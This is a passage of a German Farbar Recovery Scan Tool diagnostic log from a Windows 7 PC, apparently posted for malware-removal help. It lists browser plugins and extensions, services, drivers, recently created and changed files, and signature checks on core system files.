FF Plugin-x32: @java.com/DTPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\dtplugin\npDeployJava1.dll [2017-04-30] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.131.2 -> C:\Program Files (x86)\Java\jre1.8.0_131\bin\plugin2\npjp2.dll [2017-04-30] (Oracle Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2013-06-21] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2013-06-21] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.26.9\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2254724001-3966478908-1047364323-1001: @tools.google.com/Google Update;version=3 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)
FF Plugin HKU\S-1-5-21-2254724001-3966478908-1047364323-1001: @tools.google.com/Google Update;version=9 -> C:\Users\Hamlet\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-27] (Google Inc.)

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx

Opera: 
=======
OPR StartupUrls: "file:///D:/HTML/_Start/Startseite.html"
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\bbkekonodcdmedgffkkbgmnnekbainbg [2017-04-29]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\cfbekbndggmbdkfhjandenfihkdkndil [2017-04-14]
OPR Extension: (The Printliminator) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ddlmnofhlaecjnfohaphgklgbiofiigl [2017-04-14]
OPR Extension: (Documents) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\dppmcfgmeabflhohikbaegalkbjnbomd [2017-04-14]
OPR Extension: (Suche Bild mit Google) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\fomhjmhgjenfigcbolpklkadhliiodpk [2017-04-14]
OPR Extension: (Übersetzen) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ibnombjmjocaccigcefonnipcnlaeaed [2017-04-14]
OPR Extension: (Forget that page) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ieomhnichbamgimkoacbpinnnlnpllej [2017-04-14]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\khmbgihnlknbjgjhmekjeoidpfimabpp [2017-04-14]
OPR Extension: (Sidebar for YouTube™) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\ljkgfkfopogmclcinephnaeekjiikibd [2017-04-14]
OPR Extension: (SaveFrom.net Helfer) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\npdpplbicnmpoigidfdjadamgfkilaak [2017-04-14]
OPR Extension: (Ghostery) - C:\Users\Hamlet\AppData\Roaming\Opera Software\Opera Stable\Extensions\oneajlghdhobcelcgbgkjaipjoopcggg [2017-04-14]

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 BlackfishSQL; C:\Program Files (x86)\CodeGear\RAD Studio\6.0\bin\BSQLServer.exe [65536 2009-01-14] (CodeGear) [Datei ist nicht signiert]
R2 DirMngr; C:\Program Files (x86)\GNU\GnuPG\dirmngr.exe [216576 2016-04-05] () [Datei ist nicht signiert]
R2 FirebirdGuardianDefaultInstance; C:\Program Files\DataBases\Firebird_2_5\bin\fbguard.exe [154112 2013-03-19] (Firebird Project) [Datei ist nicht signiert]
R2 FirebirdServerDefaultInstance; C:\Program Files\DataBases\Firebird_2_5\bin\fbserver.exe [5708800 2013-03-19] (Firebird Project) [Datei ist nicht signiert]
S4 hpqcxs08; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqcxs08.dll [248832 2009-05-21] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [133120 2009-05-21] (Hewlett-Packard Co.) [Datei ist nicht signiert]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1037824 2009-09-08] (Hewlett-Packard Co.) [Datei ist nicht signiert]
S2 IBG_developer_ibxe3; C:\Program Files (x86)\Embarcadero\Studio\15.0\InterBaseXE3\bin\ibguard.exe [636744 2014-05-14] (Embarcadero Technologies, Inc.)
S3 IBS_developer_ibxe3; C:\Program Files (x86)\Embarcadero\Studio\15.0\InterBaseXE3\bin\ibserver.exe [5489992 2014-05-14] (Embarcadero Technologies, Inc.)
S2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [4355024 2017-01-20] (Malwarebytes)
S3 MsDtsServer110; C:\Program Files\Microsoft SQL Server\110\DTS\Binn\MsDtsSrvr.exe [218200 2012-02-11] (Microsoft Corporation)
S3 MSSQLFDLauncher; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\fdlauncher.exe [49752 2012-02-11] (Microsoft Corporation)
S3 MSSQLSERVER; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe [191064 2012-02-11] (Microsoft Corporation)
S3 MSSQLServerOLAPService; C:\Program Files\Microsoft SQL Server\MSAS11.MSSQLSERVER\OLAP\bin\msmdsrv.exe [61538904 2012-02-11] (Microsoft Corporation)
S3 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
S3 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2008-12-03] (Hewlett-Packard) [Datei ist nicht signiert]
S3 ReportServer; C:\Program Files\Microsoft SQL Server\MSRS11.MSSQLSERVER\Reporting Services\ReportServer\bin\ReportingServicesService.exe [2348632 2012-02-11] (Microsoft Corporation)
S3 SQL Server Distributed Replay Client; C:\Program Files (x86)\Microsoft SQL Server\110\Tools\DReplayClient\DReplayClient.exe [137304 2012-02-11] (Microsoft Corporation)
S3 SQL Server Distributed Replay Controller; C:\Program Files (x86)\Microsoft SQL Server\110\Tools\DReplayController\DReplayController.exe [342104 2012-02-11] (Microsoft Corporation)
S3 SQLSERVERAGENT; C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\SQLAGENT.EXE [597080 2012-02-11] (Microsoft Corporation)
S3 TDslMgrService; C:\Program Files (x86)\T-Online\DSL-Manager\DslMgrSvc.exe [290816 2007-08-01] (T-Systems Enterprise Services GmbH) [Datei ist nicht signiert]
R3 VyprVPN; C:\Program Files (x86)\VyprVPN\VyprVPNService.exe [270336 2016-10-07] (Golden Frog, GmbH.) [Datei ist nicht signiert]
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
S4 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S4 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]
S3 PDF Architect 5 Manager; "C:\ProgramData\pdfforge\PDF Architect 5 Manager\PDF Architect 5\Architect Manager.exe" [X]
S3 PDF Architect Helper Service; "C:\Program Files (x86)\PDF Architect\HelperService.exe" [X]
S3 PDF Architect Service; "C:\Program Files (x86)\PDF Architect\ConversionService.exe" [X]
S4 Sony PC Companion; "C:\Program Files (x86)\Sony\Sony PC Companion\PCCService.exe" [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S3 Bulk1528; C:\Windows\System32\Drivers\Bulk1528.sys [14848 2008-06-28] (SunPlus)
S2 Ca1528av; C:\Windows\System32\Drivers\Ca1528av.sys [533760 2008-12-17] (Digital Camera)
S2 DgiVecp; C:\Windows\SysWOW64\Drivers\DgiVecp.sys [41984 2007-08-13] (Samsung Electronics Co., Ltd.) [Datei ist nicht signiert]
R1 DslMNLwf; C:\Windows\System32\DRIVERS\dslmnlwf.sys [19008 2007-08-01] (T-Systems Enterprise Services GmbH)
R3 MTsensor; C:\Windows\System32\DRIVERS\ASACPI.sys [15416 2009-05-14] ()
R1 RsFx0200; C:\Windows\System32\DRIVERS\RsFx0200.sys [334936 2012-02-11] (Microsoft Corporation)
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2014-07-16] () [Datei ist nicht signiert]
S3 tapvyprvpn; C:\Windows\System32\DRIVERS\tapvyprvpn.sys [44896 2014-08-28] (The OpenVPN Project)
R0 tclondrv; C:\Windows\System32\DRIVERS\tclondrv.sys [26856 2012-02-24] (TuneClone Software)
U5 UnlockerDriver5; C:\Program Files\Utils\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()
R1 VBoxNetAdp; C:\Windows\System32\DRIVERS\VBoxNetAdp6.sys [131144 2017-03-15] (Oracle Corporation)
R1 VBoxNetLwf; C:\Windows\System32\DRIVERS\VBoxNetLwf.sys [205440 2017-03-15] (Oracle Corporation)
S3 VBoxUSB; C:\Windows\System32\Drivers\VBoxUSB.sys [135824 2016-07-12] (Oracle Corporation)
S3 NAVENG; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20160614.008\ENG64.SYS [X]
S3 NAVEX15; \??\C:\Program Files (x86)\Norton Security\NortonData\22.5.0.124\Definitions\SDSDefs\20160614.008\EX64.SYS [X]
S3 VBoxNetFlt; system32\DRIVERS\VBoxNetFlt.sys [X]
S3 VGPU; System32\drivers\rdvgkmd.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-08 10:17 - 2017-05-08 10:17 - 00024989 _____ C:\Users\Hamlet\Desktop\FRST.txt
2017-05-08 10:16 - 2017-05-08 10:16 - 00000000 ____D C:\Users\Hamlet\Desktop\FRST-OlderVersion
2017-05-08 10:06 - 2017-05-08 10:06 - 00000022 _____ C:\Windows\S.dirmngr
2017-05-08 09:52 - 2017-05-08 09:52 - 00001415 _____ C:\Users\Hamlet\Desktop\Fixlist.txt
2017-05-08 09:41 - 2017-05-08 09:41 - 00000876 _____ C:\Users\Hamlet\Desktop\checkup.txt
2017-05-07 16:05 - 2017-05-07 16:05 - 00000841 _____ C:\Users\Hamlet\Desktop\checkup.alt
2017-05-07 15:55 - 2017-05-07 15:55 - 00852720 _____ C:\Users\Hamlet\Desktop\SecurityCheck.exe
2017-05-07 05:52 - 2017-05-08 09:53 - 00000000 ____D C:\Users\Hamlet\Desktop\Schutztools
2017-05-07 00:42 - 2017-05-07 00:41 - 02870984 _____ (ESET) C:\Users\Hamlet\Desktop\esetsmartinstaller_deu.exe
2017-05-07 00:38 - 2017-05-07 00:38 - 00001266 _____ C:\Users\Hamlet\Desktop\mbam.txt
2017-05-06 19:34 - 2017-05-06 22:26 - 00000000 ____D C:\AdwCleaner
2017-05-06 17:17 - 2017-05-06 17:17 - 00001040 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-06 17:17 - 2017-05-06 17:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-06 17:17 - 2017-05-06 17:17 - 00000000 ____D C:\Program Files\VS Revo Group
2017-05-06 10:22 - 2017-05-06 18:58 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-05-06 02:33 - 2017-05-06 02:33 - 07013752 _____ (Tim Kosse) C:\Users\Hamlet\Downloads\FileZilla_3.25.2_win64-setup.exe
2017-05-05 23:08 - 2017-05-08 10:16 - 02429440 _____ (Farbar) C:\Users\Hamlet\Desktop\FRST64.exe
2017-05-05 13:38 - 2017-05-08 09:57 - 00000000 ____D C:\FRST
2017-05-02 00:20 - 2017-05-02 00:20 - 00001106 _____ C:\Users\Hamlet\Desktop\Avast Meldungen.lnk
2017-05-01 01:56 - 2013-07-19 14:01 - 00001133 _____ C:\Users\Hamlet\Desktop\Opera.lnk
2017-04-30 14:17 - 2017-05-08 10:07 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-04-30 14:17 - 2017-05-08 10:07 - 00186304 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMChameleon.sys
2017-04-30 14:17 - 2017-05-08 10:07 - 00111544 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-04-30 14:17 - 2017-05-08 10:07 - 00082720 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-04-30 14:17 - 2017-05-08 10:07 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-04-30 14:17 - 2017-05-06 23:43 - 00001873 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-04-30 14:17 - 2017-05-06 23:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-04-30 14:17 - 2017-04-30 14:17 - 00000000 ____D C:\Program Files\Malwarebytes
2017-04-30 14:17 - 2017-03-22 11:02 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-04-30 05:18 - 2017-05-06 09:45 - 00002127 _____ C:\Users\Public\BuBa.ini
2017-04-29 03:36 - 2017-04-29 03:36 - 00000783 _____ C:\Users\Hamlet\.gitconfig
2017-04-27 23:51 - 2017-04-27 23:51 - 00003450 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core1d2bfa05e8820a2
2017-04-27 01:23 - 2017-04-27 02:35 - 00000000 ____D C:\Users\Hamlet\AppData\Local\VirtualStore
2017-04-27 01:08 - 2017-04-27 01:08 - 01238016 _____ (SQLite Development Team) C:\Windows\system32\sqlite3.dll
2017-04-27 01:08 - 2017-04-27 01:08 - 00533745 _____ C:\Windows\system32\sqlite.zip
2017-04-27 01:08 - 2017-04-27 01:08 - 00004721 _____ C:\Windows\system32\sqlite3.def
2017-04-26 18:32 - 2017-03-15 11:49 - 00223232 _____ C:\Windows\SysWOW64\TMSWebOSMapsDXE7.bpl
2017-04-26 18:32 - 2014-05-07 10:49 - 00216064 _____ C:\Windows\SysWOW64\TMSWebOSMapsDXE6.bpl
2017-04-23 02:10 - 2017-04-23 02:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office
2017-04-22 13:21 - 2017-04-22 13:21 - 00000000 ____H C:\Users\Hamlet\Documents\Default.rdp
2017-04-22 05:23 - 2017-04-22 05:23 - 00001560 _____ C:\Users\Hamlet\Desktop\TMS FMX Gui.lnk
2017-04-18 19:36 - 2017-04-18 19:36 - 00292080 _____ C:\Windows\Minidump\041817-29437-01.dmp
2017-04-13 16:49 - 2017-04-25 22:45 - 00001659 _____ C:\Users\Hamlet\Desktop\HSuper64.lnk
2017-04-13 16:48 - 2017-04-25 16:32 - 00001659 _____ C:\Users\Hamlet\Desktop\HSuper-32.lnk
2017-04-13 00:12 - 2017-04-13 00:07 - 00000826 _____ C:\Users\Hamlet\Desktop\Git GUI.lnk
2017-04-13 00:12 - 2017-04-13 00:07 - 00000778 _____ C:\Users\Hamlet\Desktop\Git CMD.lnk
2017-04-13 00:07 - 2017-04-13 00:07 - 00000801 _____ C:\Users\Public\Desktop\Git Bash.lnk
2017-04-13 00:07 - 2017-04-13 00:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Git
2017-04-13 00:07 - 2017-04-13 00:07 - 00000000 ____D C:\ProgramData\Git
2017-04-12 18:03 - 2015-11-22 17:31 - 00001848 _____ C:\Users\Hamlet\Desktop\Seattle.txt
2017-04-12 16:21 - 2017-04-12 16:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TMS FMX UI Pack RS XE7
2017-04-11 15:12 - 2017-04-11 15:12 - 00001073 _____ C:\Users\Public\Desktop\VirtualBox.lnk
2017-04-11 15:12 - 2017-03-15 16:18 - 00959720 _____ (Oracle Corporation) C:\Windows\system32\Drivers\VBoxDrv.sys
2017-04-08 13:35 - 2017-04-08 13:35 - 00001213 _____ C:\Users\Hamlet\Desktop\W7Ulti64.lnk

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-08 10:15 - 2013-08-15 14:16 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\FileZilla
2017-05-08 10:13 - 2015-05-28 07:47 - 00013187 _____ C:\Users\Public\FreeCommander.ini
2017-05-08 10:13 - 2013-07-19 14:18 - 00000000 ____D C:\Temp
2017-05-08 10:12 - 2009-07-14 06:45 - 00026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-05-08 10:12 - 2009-07-14 06:45 - 00026352 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-05-08 10:11 - 2013-07-19 14:01 - 00000000 ____D C:\Program Files (x86)\Opera
2017-05-08 10:07 - 2013-12-12 18:36 - 00000000 ____D C:\Users\Hamlet\AppData\Local\TSVNCache
2017-05-08 10:07 - 2013-07-20 01:53 - 00000000 ____D C:\ProgramData\Embarcadero
2017-05-08 10:06 - 2013-08-10 16:17 - 00065536 _____ C:\Windows\system32\Ikeext.etl
2017-05-08 10:06 - 2013-07-19 14:00 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2017-05-08 10:06 - 2013-07-19 13:03 - 00000000 ____D C:\ProgramData\NVIDIA
2017-05-08 10:06 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-05-08 10:06 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\tracing
2017-05-08 09:59 - 2013-08-30 05:12 - 00000000 ____D C:\Users\Hamlet\AppData\Local\CrashDumps
2017-05-08 09:36 - 2013-07-19 14:00 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2017-05-07 05:54 - 2014-03-23 11:47 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\vlc
2017-05-06 23:03 - 2013-10-13 10:34 - 00000000 ____D C:\Users\Hamlet\AppData\LocalLow\Temp
2017-05-06 19:40 - 2013-11-09 12:31 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Yahoo!
2017-05-06 18:59 - 2016-08-14 19:20 - 00000000 ____D C:\ProgramData\AVAST Software
2017-05-06 18:59 - 2013-07-19 14:10 - 00000000 ____D C:\Program Files\Utils
2017-05-06 16:15 - 2015-08-30 04:01 - 00124522 _____ C:\Users\Hamlet\Desktop\Zwischen.txt
2017-05-06 10:23 - 2014-11-27 10:46 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-06 09:48 - 2013-07-20 02:17 - 00000000 ____D C:\ProgramData\firebird
2017-05-06 02:33 - 2014-07-25 18:47 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FileZilla
2017-05-05 23:21 - 2016-02-19 04:31 - 00000000 ____D C:\Users\Hamlet\Documents\Web-Recherchen
2017-05-05 23:20 - 2013-07-19 14:06 - 00000000 ____D C:\Program Files (x86)\Internet
2017-05-05 23:18 - 2015-02-07 02:26 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\DVDVideoSoft
2017-05-05 23:17 - 2017-04-04 17:30 - 00000000 ____D C:\ProgramData\Elevate Software
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\Users\Hamlet\AppData\Local\ABBYY
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\ProgramData\ABBYY
2017-05-05 23:13 - 2016-09-04 08:20 - 00000000 ____D C:\Program Files (x86)\ABBYY
2017-05-05 21:49 - 2016-04-29 16:13 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\gnupg
2017-05-05 13:47 - 2015-05-16 21:56 - 00004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2017-04-30 19:29 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\inf
2017-04-30 19:28 - 2013-11-12 17:38 - 00000000 ____D C:\Windows\pss
2017-04-30 19:23 - 2016-12-25 10:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-04-30 19:23 - 2013-10-22 17:48 - 00000000 ____D C:\ProgramData\Oracle
2017-04-30 19:23 - 2013-07-26 01:59 - 00000000 ____D C:\Program Files (x86)\Java
2017-04-30 19:22 - 2016-12-25 10:47 - 00097856 _____ (Oracle Corporation) C:\Windows\SysWOW64\WindowsAccessBridge-32.dll
2017-04-30 19:07 - 2013-12-07 18:03 - 00007608 _____ C:\Users\Hamlet\AppData\Local\Resmon.ResmonCfg
2017-04-30 14:16 - 2013-07-19 13:14 - 00000000 ____D C:\Program Files (x86)\Utils
2017-04-30 05:44 - 2013-11-09 12:26 - 00000000 ____D C:\Program Files (x86)\HP
2017-04-30 05:36 - 2013-07-20 21:33 - 00000000 ____D C:\Users\Hamlet\.VirtualBox
2017-04-30 05:25 - 2009-07-14 06:45 - 00507400 _____ C:\Windows\system32\FNTCACHE.DAT
2017-04-29 07:14 - 2015-10-05 09:54 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Downloaded Installations
2017-04-29 06:53 - 2013-09-29 05:44 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\Audacity
2017-04-29 03:36 - 2013-07-19 12:53 - 00000000 ____D C:\Users\Hamlet
2017-04-28 11:17 - 2013-07-20 01:08 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Microsoft Help
2017-04-27 23:51 - 2015-04-19 23:41 - 00003722 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001UA
2017-04-27 01:17 - 2014-06-21 10:47 - 00003864 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1374235318
2017-04-27 01:09 - 2009-07-14 04:34 - 00000957 _____ C:\Windows\win.ini
2017-04-26 18:32 - 2015-07-08 14:40 - 00000000 ____D C:\Users\Public\Documents\tmssoftware
2017-04-26 18:32 - 2014-12-19 14:31 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero RAD Studio XE7
2017-04-26 00:09 - 2013-08-09 01:54 - 00000000 ____D C:\Users\Hamlet\Documents\SQL Server Management Studio
2017-04-25 08:19 - 2016-07-19 00:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\HK-Software
2017-04-25 08:19 - 2016-07-19 00:50 - 00000000 ____D C:\Program Files (x86)\HK-Software
2017-04-24 18:46 - 2017-01-25 10:03 - 00000000 ____D C:\Users\Hamlet\AppData\Roaming\typhon64
2017-04-23 01:54 - 2013-07-20 03:26 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-04-18 19:59 - 2014-07-04 10:32 - 00000000 ____D C:\Users\Hamlet\AppData\Local\Adobe
2017-04-18 19:59 - 2013-07-20 03:26 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-04-18 19:59 - 2013-07-20 03:26 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-18 19:59 - 2013-07-20 03:26 - 00000000 ____D C:\Windows\system32\Macromed
2017-04-18 19:36 - 2013-08-16 21:41 - 00000000 ____D C:\Windows\Minidump
2017-04-12 23:51 - 2013-08-09 10:06 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2012
2017-04-12 23:51 - 2013-08-09 01:21 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2010
2017-04-12 23:51 - 2013-07-20 01:09 - 00000000 ____D C:\Users\Hamlet\Documents\Visual Studio 2008
2017-04-12 23:47 - 2014-01-11 19:41 - 00006107 _____ C:\Users\Hamlet\.bash_history
2017-04-12 18:05 - 2017-03-24 20:43 - 00000000 ___HD C:\ProgramData\{5D50B637-4756-435A-816E-68ABFE86FC69}
2017-04-12 08:40 - 2014-01-11 04:15 - 00000000 ____D C:\ProgramData\VMware
2017-04-12 01:06 - 2015-11-04 14:56 - 00002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-04-11 02:44 - 2015-04-19 23:41 - 00003450 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskUserS-1-5-21-2254724001-3966478908-1047364323-1001Core
2017-04-09 14:22 - 2017-04-06 11:42 - 00000000 ____D C:\Users\Hamlet\Desktop\Elevate

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2016-01-25 22:14 - 2016-01-25 22:14 - 0000119 _____ () C:\Program Files (x86)\firebird.log
2013-09-29 05:19 - 2016-09-03 14:56 - 0000089 _____ () C:\Users\Hamlet\AppData\Roaming\Camdata.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0000408 _____ () C:\Users\Hamlet\AppData\Roaming\CamLayout.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0000408 _____ () C:\Users\Hamlet\AppData\Roaming\CamShapes.ini
2013-09-29 05:19 - 2016-09-03 14:56 - 0004527 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.cfg
2013-09-30 11:45 - 2013-09-30 11:45 - 0000098 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.command
2013-09-30 12:14 - 2013-09-30 12:14 - 0000000 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.Data.ini
2013-09-30 12:14 - 2013-09-30 12:14 - 0001207 _____ () C:\Users\Hamlet\AppData\Roaming\CamStudio.Producer.ini
2014-04-20 10:47 - 2014-07-06 20:55 - 0000318 _____ () C:\Users\Hamlet\AppData\Roaming\repmand.ini
2014-04-20 10:47 - 2014-07-06 20:55 - 0000033 _____ () C:\Users\Hamlet\AppData\Roaming\repmandlib.ini
2016-01-27 14:09 - 2016-01-27 14:09 - 0013138 _____ () C:\Users\Hamlet\AppData\Roaming\Test.tiff
2014-06-26 12:25 - 2017-03-28 18:37 - 0006144 _____ () C:\Users\Hamlet\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
2015-04-01 06:38 - 2015-04-01 06:38 - 0004096 ____H () C:\Users\Hamlet\AppData\Local\keyfile3.drm
2014-10-01 13:00 - 2014-10-01 13:00 - 0002768 _____ () C:\Users\Hamlet\AppData\Local\recently-used.xbel
2013-12-07 18:03 - 2017-04-30 19:07 - 0007608 _____ () C:\Users\Hamlet\AppData\Local\Resmon.ResmonCfg
2013-11-09 12:25 - 2016-04-10 18:10 - 0017629 _____ () C:\ProgramData\hpzinstall.log
2014-05-16 05:44 - 2014-05-16 05:44 - 0000072 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.64.bc
2013-10-06 10:17 - 2013-10-09 09:14 - 0000043 _____ () C:\ProgramData\PassTresorFB.ini
2013-10-16 14:02 - 2013-10-16 14:02 - 0000042 _____ () C:\ProgramData\PassTresorPro.ini
2013-10-27 20:52 - 2013-10-27 20:52 - 0000044 _____ () C:\ProgramData\PassTresorProXE.ini
2013-12-28 22:54 - 2013-12-28 22:55 - 0000091 _____ () C:\ProgramData\Reportix.ini

==================== Bamital & volsnap ======================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

C:\Windows\system32\winlogon.exe => Datei ist digital signiert
C:\Windows\system32\wininit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\wininit.exe => Datei ist digital signiert
C:\Windows\explorer.exe => Datei ist digital signiert
C:\Windows\SysWOW64\explorer.exe => Datei ist digital signiert
C:\Windows\system32\svchost.exe => Datei ist digital signiert
C:\Windows\SysWOW64\svchost.exe => Datei ist digital signiert
C:\Windows\system32\services.exe => Datei ist digital signiert
C:\Windows\system32\User32.dll => Datei ist digital signiert
C:\Windows\SysWOW64\User32.dll => Datei ist digital signiert
C:\Windows\system32\userinit.exe => Datei ist digital signiert
C:\Windows\SysWOW64\userinit.exe => Datei ist digital signiert
C:\Windows\system32\rpcss.dll => Datei ist digital signiert
C:\Windows\system32\dnsapi.dll => Datei ist digital signiert
